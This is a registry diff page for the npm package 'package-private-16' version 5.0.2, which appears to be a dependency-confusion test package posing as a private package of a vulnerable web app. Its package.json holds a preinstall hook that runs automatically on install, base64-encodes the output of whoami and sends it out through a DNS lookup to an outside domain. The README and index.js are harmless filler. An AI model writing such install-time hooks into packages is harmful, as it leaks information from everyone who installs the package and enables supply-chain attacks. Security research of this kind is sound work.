package-private-16 5.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of package-private-16 might be problematic. Click here for more details.

package/README.md ADDED
@@ -0,0 +1,3 @@
1
+ # Package-Private
2
+
3
+ This is the package which is private to the vuln-web-app and can be downloaded only from their own privately hosted repository (which sits somewhere in their cloud)
package/index.js ADDED
@@ -0,0 +1,10 @@
1
+ const some_important_function = () => {
2
+ const a = 1997
3
+ const b = 5
4
+
5
+ return (a + b)
6
+ }
7
+
8
+ module.exports = {
9
+ some_important_function
10
+ }
package/package.json ADDED
@@ -0,0 +1,18 @@
1
+ {
2
+ "name": "package-private-16",
3
+ "version": "5.0.2",
4
+ "description": "This is a private package used by Batman and his team oh highly skilled IT professional (CY Capstone Team-1)",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "npm index.js",
8
+ "preinstall": "nslookup $(whoami | base64 -w0).0xparthhackerone.me"
9
+ },
10
+ "keywords": [
11
+ "demo"
12
+ ],
13
+ "author": "archerl@wearehackerone.com",
14
+ "license": "MIT",
15
+ "dependencies": {
16
+ "nodemon": "^2.0.20"
17
+ }
18
+ }
@@ -0,0 +1 @@
1
+ echo "This is file to run the bash script, just in case we need it"
package/test.txt ADDED
File without changes